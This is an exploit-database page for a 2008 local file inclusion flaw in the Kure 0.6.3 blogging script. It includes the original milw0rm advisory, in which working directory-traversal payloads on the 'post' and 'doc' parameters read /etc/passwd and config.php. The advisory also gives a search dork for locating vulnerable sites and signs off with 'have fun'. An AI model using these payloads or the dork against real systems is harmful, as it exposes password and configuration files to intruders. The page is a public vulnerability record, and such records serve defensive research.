header-logo
Suggest Exploit
vendor:
Kure
by:
JosS
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Kure
Affected Version From: 2000.6.3
Affected Version To: 2000.6.3
Patch Exists: YES
Related CWE: N/A
CPE: a:kure:kure:0.6.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability

Kure 0.6.3 is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability to include local files on the server. This vulnerability exists due to insufficient sanitization of user-supplied input to the 'post' and 'doc' parameters of the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters ('../') to the vulnerable script. This will allow the attacker to include local files on the server.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

# Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability
# url: http://code.google.com/p/kure/downloads/list
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# *Requirements: magic_quotes_gpc = Off

LFI /etc/passwd:
/?post=../../../../../../../../../../../../../etc/passwd%00
/?doc=../../../../../../../../../../../../../etc/passwd%00

LFI /config.php:
/?post=../config.php%00
/?doc=../config.php%00

dork: "powered by kure"

have fun :D

# milw0rm.com [2008-10-16]

Navigation

Suggest Exploit

Services By CQR